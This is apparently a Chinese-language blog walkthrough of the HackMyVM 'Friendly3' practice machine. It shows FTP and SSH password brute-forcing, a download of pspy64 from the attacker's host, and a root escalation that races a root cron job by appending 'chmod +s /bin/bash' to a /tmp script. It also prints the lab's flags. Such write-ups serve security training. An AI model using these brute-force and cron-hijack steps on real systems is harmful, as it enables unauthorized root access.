hmv[-_-]Friendly3

Friendly3

image-20240414173445522

image-20240414173430381

信息搜集

端口扫描

rustscan -a 172.20.10.5 -- -A
Open 172.20.10.5:21
Open 172.20.10.5:22
Open 172.20.10.5:80

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey: 
|   256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=
|   256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l
80/tcp open  http    syn-ack nginx 1.22.1
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

gobuster dir -u http://172.20.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png

没有扫到东西。

漏洞发现

踩点

Hi, sysadmin
I want you to know that I've just uploaded the new files into the FTP Server.
See you,
juan.

爆破FTP

查看一下FTP,尝试匿名登录,我尝试了一下名字:

admin
root
ftp
anonymous
juan
sysadmin
juan.

都不行,尝试爆破juan和sysadmin

image-20240414180140784

得到用户

juan
alexis

查看:

┌──(kali💀kali)-[~/temp/Friendly3]
└─$ ftp 172.20.10.5                                             
Connected to 172.20.10.5.
220 (vsFTPd 3.0.3)
Name (172.20.10.5:kali): juan
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||51316|)
150 Here comes the directory listing.
drwxr-xr-x   14 0        0            4096 Jun 25  2023 .
drwxr-xr-x   14 0        0            4096 Jun 25  2023 ..
-rw-r--r--    1 0        0               0 Jun 25  2023 file1
-rw-r--r--    1 0        0               0 Jun 25  2023 file10
-rw-r--r--    1 0        0               0 Jun 25  2023 file100
-rw-r--r--    1 0        0               0 Jun 25  2023 file11
-rw-r--r--    1 0        0               0 Jun 25  2023 file12
-rw-r--r--    1 0        0               0 Jun 25  2023 file13
-rw-r--r--    1 0        0               0 Jun 25  2023 file14
-rw-r--r--    1 0        0               0 Jun 25  2023 file15
-rw-r--r--    1 0        0               0 Jun 25  2023 file16
-rw-r--r--    1 0        0               0 Jun 25  2023 file17
-rw-r--r--    1 0        0               0 Jun 25  2023 file18
-rw-r--r--    1 0        0               0 Jun 25  2023 file19
-rw-r--r--    1 0        0               0 Jun 25  2023 file2
-rw-r--r--    1 0        0               0 Jun 25  2023 file20
-rw-r--r--    1 0        0               0 Jun 25  2023 file21
-rw-r--r--    1 0        0               0 Jun 25  2023 file22
-rw-r--r--    1 0        0               0 Jun 25  2023 file23
-rw-r--r--    1 0        0               0 Jun 25  2023 file24
-rw-r--r--    1 0        0               0 Jun 25  2023 file25
-rw-r--r--    1 0        0               0 Jun 25  2023 file26
-rw-r--r--    1 0        0               0 Jun 25  2023 file27
-rw-r--r--    1 0        0               0 Jun 25  2023 file28
-rw-r--r--    1 0        0               0 Jun 25  2023 file29
-rw-r--r--    1 0        0               0 Jun 25  2023 file3
-rw-r--r--    1 0        0               0 Jun 25  2023 file30
-rw-r--r--    1 0        0               0 Jun 25  2023 file31
-rw-r--r--    1 0        0               0 Jun 25  2023 file32
-rw-r--r--    1 0        0               0 Jun 25  2023 file33
-rw-r--r--    1 0        0               0 Jun 25  2023 file34
-rw-r--r--    1 0        0               0 Jun 25  2023 file35
-rw-r--r--    1 0        0               0 Jun 25  2023 file36
-rw-r--r--    1 0        0               0 Jun 25  2023 file37
-rw-r--r--    1 0        0               0 Jun 25  2023 file38
-rw-r--r--    1 0        0               0 Jun 25  2023 file39
-rw-r--r--    1 0        0               0 Jun 25  2023 file4
-rw-r--r--    1 0        0               0 Jun 25  2023 file40
-rw-r--r--    1 0        0               0 Jun 25  2023 file41
-rw-r--r--    1 0        0               0 Jun 25  2023 file42
-rw-r--r--    1 0        0               0 Jun 25  2023 file43
-rw-r--r--    1 0        0               0 Jun 25  2023 file44
-rw-r--r--    1 0        0               0 Jun 25  2023 file45
-rw-r--r--    1 0        0               0 Jun 25  2023 file46
-rw-r--r--    1 0        0               0 Jun 25  2023 file47
-rw-r--r--    1 0        0               0 Jun 25  2023 file48
-rw-r--r--    1 0        0               0 Jun 25  2023 file49
-rw-r--r--    1 0        0               0 Jun 25  2023 file5
-rw-r--r--    1 0        0               0 Jun 25  2023 file50
-rw-r--r--    1 0        0               0 Jun 25  2023 file51
-rw-r--r--    1 0        0               0 Jun 25  2023 file52
-rw-r--r--    1 0        0               0 Jun 25  2023 file53
-rw-r--r--    1 0        0               0 Jun 25  2023 file54
-rw-r--r--    1 0        0               0 Jun 25  2023 file55
-rw-r--r--    1 0        0               0 Jun 25  2023 file56
-rw-r--r--    1 0        0               0 Jun 25  2023 file57
-rw-r--r--    1 0        0               0 Jun 25  2023 file58
-rw-r--r--    1 0        0               0 Jun 25  2023 file59
-rw-r--r--    1 0        0               0 Jun 25  2023 file6
-rw-r--r--    1 0        0               0 Jun 25  2023 file60
-rw-r--r--    1 0        0               0 Jun 25  2023 file61
-rw-r--r--    1 0        0               0 Jun 25  2023 file62
-rw-r--r--    1 0        0               0 Jun 25  2023 file63
-rw-r--r--    1 0        0               0 Jun 25  2023 file64
-rw-r--r--    1 0        0               0 Jun 25  2023 file65
-rw-r--r--    1 0        0               0 Jun 25  2023 file66
-rw-r--r--    1 0        0               0 Jun 25  2023 file67
-rw-r--r--    1 0        0               0 Jun 25  2023 file68
-rw-r--r--    1 0        0               0 Jun 25  2023 file69
-rw-r--r--    1 0        0               0 Jun 25  2023 file7
-rw-r--r--    1 0        0               0 Jun 25  2023 file70
-rw-r--r--    1 0        0               0 Jun 25  2023 file71
-rw-r--r--    1 0        0               0 Jun 25  2023 file72
-rw-r--r--    1 0        0               0 Jun 25  2023 file73
-rw-r--r--    1 0        0               0 Jun 25  2023 file74
-rw-r--r--    1 0        0               0 Jun 25  2023 file75
-rw-r--r--    1 0        0               0 Jun 25  2023 file76
-rw-r--r--    1 0        0               0 Jun 25  2023 file77
-rw-r--r--    1 0        0               0 Jun 25  2023 file78
-rw-r--r--    1 0        0               0 Jun 25  2023 file79
-rw-r--r--    1 0        0               0 Jun 25  2023 file8
-rw-r--r--    1 0        0              36 Jun 25  2023 file80
-rw-r--r--    1 0        0               0 Jun 25  2023 file81
-rw-r--r--    1 0        0               0 Jun 25  2023 file82
-rw-r--r--    1 0        0               0 Jun 25  2023 file83
-rw-r--r--    1 0        0               0 Jun 25  2023 file84
-rw-r--r--    1 0        0               0 Jun 25  2023 file85
-rw-r--r--    1 0        0               0 Jun 25  2023 file86
-rw-r--r--    1 0        0               0 Jun 25  2023 file87
-rw-r--r--    1 0        0               0 Jun 25  2023 file88
-rw-r--r--    1 0        0               0 Jun 25  2023 file89
-rw-r--r--    1 0        0               0 Jun 25  2023 file9
-rw-r--r--    1 0        0               0 Jun 25  2023 file90
-rw-r--r--    1 0        0               0 Jun 25  2023 file91
-rw-r--r--    1 0        0               0 Jun 25  2023 file92
-rw-r--r--    1 0        0               0 Jun 25  2023 file93
-rw-r--r--    1 0        0               0 Jun 25  2023 file94
-rw-r--r--    1 0        0               0 Jun 25  2023 file95
-rw-r--r--    1 0        0               0 Jun 25  2023 file96
-rw-r--r--    1 0        0               0 Jun 25  2023 file97
-rw-r--r--    1 0        0               0 Jun 25  2023 file98
-rw-r--r--    1 0        0               0 Jun 25  2023 file99
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold10
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold11
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold12
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold13
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold14
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold15
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold4
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold5
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold6
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold7
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold8
drwxr-xr-x    2 0        0            4096 Jun 25  2023 fold9
-rw-r--r--    1 0        0              58 Jun 25  2023 fole32
226 Directory send OK.
ftp> get file80
local: file80 remote: file80
229 Entering Extended Passive Mode (|||21632|)
150 Opening BINARY mode data connection for file80 (36 bytes).
100% |***********************************************************************************************************|    36        0.39 KiB/s    00:00 ETA
226 Transfer complete.
36 bytes received in 00:00 (0.38 KiB/s)
ftp> get fole32
local: fole32 remote: fole32
229 Entering Extended Passive Mode (|||14269|)
150 Opening BINARY mode data connection for fole32 (58 bytes).
100% |***********************************************************************************************************|    58       92.09 KiB/s    00:00 ETA
226 Transfer complete.
58 bytes received in 00:00 (55.15 KiB/s)
ftp> get fold10
local: fold10 remote: fold10
229 Entering Extended Passive Mode (|||46237|)
550 Failed to open file.
ftp> cd fold10
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||38694|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jun 25  2023 .
drwxr-xr-x   14 0        0            4096 Jun 25  2023 ..
-rw-r--r--    1 0        0             163 Jun 25  2023 .test.txt
226 Directory send OK.
ftp> get .test.txt
local: .test.txt remote: .test.txt
229 Entering Extended Passive Mode (|||45645|)
150 Opening BINARY mode data connection for .test.txt (163 bytes).
100% |***********************************************************************************************************|   163        1.78 KiB/s    00:00 ETA
226 Transfer complete.
163 bytes received in 00:00 (1.77 KiB/s)
ftp> exit
221 Goodbye.
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat file80       
Hi, I'm the sysadmin. I am bored...

┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat fole32 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba

┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat .test.txt      
Hi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...

什么玩意?暂时没啥用了,看来是,尝试ssh爆破,顺便试一下是否是相同密码:

image-20240414180420738

看来不用爆破了,但是还是让他在后面跑吧,等下,出来辣:

image-20240414180453741

提权

信息搜集

juan@friendly3:~$ ls -la
total 28
drwxr-xr-x  3 juan juan 4096 Jul 17  2023 .
drwxr-xr-x  4 root root 4096 Jun 25  2023 ..
lrwxrwxrwx  1 root root    9 Jun 25  2023 .bash_history -> /dev/null
-rw-r--r--  1 juan juan  220 Apr 23  2023 .bash_logout
-rw-r--r--  1 juan juan 3526 Apr 23  2023 .bashrc
drwxr-xr-x 14 root root 4096 Jun 25  2023 ftp
-rw-r--r--  1 juan juan  807 Apr 23  2023 .profile
-r--------  1 juan juan   33 Jul 17  2023 user.txt
juan@friendly3:~$ cat user.txt 
cb40b159c8086733d57280de3f97de30
juan@friendly3:~$ find . -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
ftp:x:100:108:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
juan:x:1001:1001::/home/juan:/bin/bash
messagebus:x:101:109::/nonexistent:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
blue:x:1002:1002::/home/blue:/bin/bash
juan@friendly3:~$ cd ..
juan@friendly3:/home$ ls -la
total 16
drwxr-xr-x  4 root root 4096 Jun 25  2023 .
drwxr-xr-x 18 root root 4096 Jun 25  2023 ..
drwxr-xr-x  2 blue blue 4096 Jun 25  2023 blue
drwxr-xr-x  3 juan juan 4096 Jul 17  2023 juan
juan@friendly3:/home$ cd blue
juan@friendly3:/home/blue$ ls -la
total 20
drwxr-xr-x 2 blue blue 4096 Jun 25  2023 .
drwxr-xr-x 4 root root 4096 Jun 25  2023 ..
lrwxrwxrwx 1 root root    9 Jun 25  2023 .bash_history -> /dev/null
-rw-r--r-- 1 blue blue  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 blue blue 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 blue blue  807 Apr 23  2023 .profile
juan@friendly3:/home/blue$ find / -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:/home/blue$ find / -user blue -name *.txt 2>/dev/null
juan@friendly3:/home/blue$ find / -user juan -name *.txt 2>/dev/null
/home/juan/user.txt
juan@friendly3:/home/blue$ find / -user root -name *.txt 2>/dev/null
/home/juan/ftp/fold8/passwd.txt
/home/juan/ftp/fold10/.test.txt
/home/juan/ftp/fold5/yt.txt
/var/cache/dictionaries-common/ispell-dicts-list.txt
/usr/share/vim/vim90/doc/help.txt
/usr/share/doc/publicsuffix/examples/test_psl.txt
/usr/share/doc/openssl/fingerprints.txt
/usr/share/doc/openssl/HOWTO/keys.txt
/usr/share/doc/vsftpd/examples/VIRTUAL_USERS/logins.txt
/usr/share/doc/libdb5.3/build_signature_amd64.txt
/usr/share/doc/mount/mount.txt
/usr/share/doc/util-linux/howto-debug.txt
/usr/share/doc/util-linux/release-schedule.txt
/usr/share/doc/util-linux/howto-man-page.txt
/usr/share/doc/util-linux/col.txt
/usr/share/doc/util-linux/pg.txt
/usr/share/doc/util-linux/howto-tests.txt
/usr/share/doc/util-linux/getopt.txt
/usr/share/doc/util-linux/getopt_changelog.txt
/usr/share/doc/util-linux/cal.txt
/usr/share/doc/util-linux/hwclock.txt
/usr/share/doc/util-linux/howto-build-sys.txt
/usr/share/doc/util-linux/PAM-configuration.txt
/usr/share/doc/util-linux/howto-compilation.txt
/usr/share/doc/util-linux/mount.txt
/usr/share/doc/util-linux/deprecated.txt
/usr/share/doc/util-linux/modems-with-agetty.txt
/usr/share/doc/util-linux/blkid.txt
/usr/share/doc/util-linux/00-about-docs.txt
/usr/share/doc/busybox/syslog.conf.txt
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold8/passwd.txt
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠛⠛⠿⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⡀⠠⠤⠒⢂⣉⣉⣉⣑⣒⣒⠒⠒⠒⠒⠒⠒⠒⠀⠀⠐⠒⠚⠻⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⡠⠔⠉⣀⠔⠒⠉⣀⣀⠀⠀⠀⣀⡀⠈⠉⠑⠒⠒⠒⠒⠒⠈⠉⠉⠉⠁⠂⠀⠈⠙⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠔⠁⠠⠖⠡⠔⠊⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠉⠲⢄⠀⠀⠀⠈⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠊⠀⢀⣀⣤⣤⣤⣤⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠜⠀⠀⠀⠀⣀⡀⠀⠈⠃⠀⠀⠀⠸⣿⣿⣿⣿
⣿⣿⣿⣿⡿⠥⠐⠂⠀⠀⠀⠀⡄⠀⠰⢺⣿⣿⣿⣿⣿⣟⠀⠈⠐⢤⠀⠀⠀⠀⠀⠀⢀⣠⣶⣾⣯⠀⠀⠉⠂⠀⠠⠤⢄⣀⠙⢿⣿⣿
⣿⡿⠋⠡⠐⠈⣉⠭⠤⠤⢄⡀⠈⠀⠈⠁⠉⠁⡠⠀⠀⠀⠉⠐⠠⠔⠀⠀⠀⠀⠀⠲⣿⠿⠛⠛⠓⠒⠂⠀⠀⠀⠀⠀⠀⠠⡉⢢⠙⣿
⣿⠀⢀⠁⠀⠊⠀⠀⠀⠀⠀⠈⠁⠒⠂⠀⠒⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⢀⣀⡠⠔⠒⠒⠂⠀⠈⠀⡇⣿
⣿⠀⢸⠀⠀⠀⢀⣀⡠⠋⠓⠤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠈⠢⠤⡀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⡠⠀⡇⣿
⣿⡀⠘⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠈⠑⡦⢄⣀⠀⠀⠐⠒⠁⢸⠀⠀⠠⠒⠄⠀⠀⠀⠀⠀⢀⠇⠀⣀⡀⠀⠀⢀⢾⡆⠀⠈⡀⠎⣸⣿
⣿⣿⣄⡈⠢⠀⠀⠀⠀⠘⣶⣄⡀⠀⠀⡇⠀⠀⠈⠉⠒⠢⡤⣀⡀⠀⠀⠀⠀⠀⠐⠦⠤⠒⠁⠀⠀⠀⠀⣀⢴⠁⠀⢷⠀⠀⠀⢰⣿⣿
⣿⣿⣿⣿⣇⠂⠀⠀⠀⠀⠈⢂⠀⠈⠹⡧⣀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⢱⠒⠒⠒⠒⢖⠒⠒⠂⠙⠏⠀⠘⡀⠀⢸⠀⠀⠀⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠑⠄⠰⠀⠀⠁⠐⠲⣤⣴⣄⡀⠀⠀⠀⠀⢸⠀⠀⠀⠀⢸⠀⠀⠀⠀⢠⠀⣠⣷⣶⣿⠀⠀⢰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠁⢀⠀⠀⠀⠀⠀⡙⠋⠙⠓⠲⢤⣤⣷⣤⣤⣤⣤⣾⣦⣤⣤⣶⣿⣿⣿⣿⡟⢹⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠑⠀⢄⠀⡰⠁⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠻⠋⠉⠛⢛⠉⠉⢹⠁⢀⢇⠎⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠈⠢⢄⡉⠂⠄⡀⠀⠈⠒⠢⠄⠀⢀⣀⣀⣰⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⣎⠀⠼⠊⠀⠀⠀⠘⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠉⠢⢄⡈⠑⠢⢄⡀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⠀⠀⠀⠀⠀⢻⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⡈⠑⠢⢄⡀⠈⠑⠒⠤⠄⣀⣀⠀⠉⠉⠉⠉⠀⠀⠀⣀⡀⠤⠂⠁⠀⢀⠆⠀⠀⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠁⠉⠒⠂⠤⠤⣀⣀⣉⡉⠉⠉⠉⠉⢀⣀⣀⡠⠤⠒⠈⠀⠀⠀⠀⣸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣤⣤⣤⣤⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold5/yt.txt
Thanks to all my YT subscribers!

借着信息搜集:

juan@friendly3:/home/blue$ sudo -l
-bash: sudo: command not found
juan@friendly3:/home/blue$ cd /
juan@friendly3:/$ ls -la
total 68
drwxr-xr-x  18 root root  4096 Jun 25  2023 .
drwxr-xr-x  18 root root  4096 Jun 25  2023 ..
lrwxrwxrwx   1 root root     7 Jun 25  2023 bin -> usr/bin
drwxr-xr-x   3 root root  4096 Jun 25  2023 boot
drwxr-xr-x  17 root root  3300 Apr 14 05:34 dev
drwxr-xr-x  63 root root  4096 Apr 14 05:34 etc
drwxr-xr-x   4 root root  4096 Jun 25  2023 home
lrwxrwxrwx   1 root root    29 Jun 25  2023 initrd.img -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx   1 root root    29 Jun 25  2023 initrd.img.old -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx   1 root root     7 Jun 25  2023 lib -> usr/lib
lrwxrwxrwx   1 root root     9 Jun 25  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root root     9 Jun 25  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root root    10 Jun 25  2023 libx32 -> usr/libx32
drwx------   2 root root 16384 Jun 25  2023 lost+found
drwxr-xr-x   3 root root  4096 Jun 25  2023 media
drwxr-xr-x   2 root root  4096 Jun 25  2023 mnt
drwxr-xr-x   2 root root  4096 Jun 25  2023 opt
dr-xr-xr-x 140 root root     0 Apr 14 05:33 proc
drwx------   4 root root  4096 Jul 17  2023 root
drwxr-xr-x  17 root root   540 Apr 14 06:04 run
lrwxrwxrwx   1 root root     8 Jun 25  2023 sbin -> usr/sbin
drwxr-xr-x   3 root root  4096 Jun 25  2023 srv
dr-xr-xr-x  13 root root     0 Apr 14 05:33 sys
drwxrwxrwt   7 root root  4096 Apr 14 06:09 tmp
drwxr-xr-x  14 root root  4096 Jun 25  2023 usr
drwxr-xr-x  12 root root  4096 Jun 25  2023 var
lrwxrwxrwx   1 root root    26 Jun 25  2023 vmlinuz -> boot/vmlinuz-6.1.0-9-amd64
lrwxrwxrwx   1 root root    26 Jun 25  2023 vmlinuz.old -> boot/vmlinuz-6.1.0-9-amd64
juan@friendly3:/$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6    * * 7   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6    1 * *   root    test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
cat: /etc/cron.weekly: Is a directory
cat: /etc/cron.yearly: Is a directory
juan@friendly3:/$ cd opt
juan@friendly3:/opt$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Jun 25  2023 .
drwxr-xr-x 18 root root 4096 Jun 25  2023 ..
-rwxr-xr-x  1 root root  190 Jun 25  2023 check_for_install.sh
juan@friendly3:/opt$ cat check_for_install.sh 
#!/bin/bash

/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash

chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash

/bin/bash /tmp/a.bash

rm -rf /tmp/a.bash
juan@friendly3:/opt$ cd /tmp
juan@friendly3:/tmp$ wget http://172.20.10.8:8888/pspy64
-bash: wget: command not found
juan@friendly3:/tmp$ busybox wget http://172.20.10.8:8888/pspy64
Connecting to 172.20.10.8:8888 (172.20.10.8:8888)
saving to 'pspy64'
pspy64               100% |***********************************************************************| 4364k  0:00:00 ETA
'pspy64' saved
juan@friendly3:/tmp$ chmod +x pspy64
juan@friendly3:/tmp$ ./pspy64

看到了一个疑似可以利用的脚本,传一个pspy64上去,看看是否是定时任务:

image-20240414181521630

确实是定时任务,尝试见缝插针写个脚本利用一下:

#!/bin/sh
while true:
do
echo "chmod + s /bin/bash" >> a.bash
done
juan@friendly3:/tmp$ ./exp.sh 
./exp.sh: line 1: 1:: command not found

what?直接执行吧。。。。。

while true;do echo 'chmod +s /bin/bash' >> a.bash;done

拿到shell!!

juan@friendly3:/tmp$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23  2023 /bin/bash
juan@friendly3:/tmp$ while true;do echo 'chmod +s /bin/bash' >> a.bash;done
^Cchmod +s /bin/bash
juan@friendly3:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash
juan@friendly3:/tmp$ bash -p
bash-5.2# cd /root
bash-5.2# ls -la
total 40
drwx------  4 root root 4096 Jul 17  2023 .
drwxr-xr-x 18 root root 4096 Jun 25  2023 ..
lrwxrwxrwx  1 root root    9 Jun 25  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
-r-xr-xr-x  1 root root  509 Jun 25  2023 interfaces.sh
-rw-------  1 root root   20 Jun 25  2023 .lesshst
drwxr-xr-x  3 root root 4096 Jun 25  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-r--------  1 root root   33 Jul 17  2023 root.txt
-rw-r--r--  1 root root   66 Jun 25  2023 .selected_editor
drwx------  2 root root 4096 Jun 25  2023 .ssh
bash-5.2# cat root.txt 
eb9748b67f25e6bd202e5fa25f534d51
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇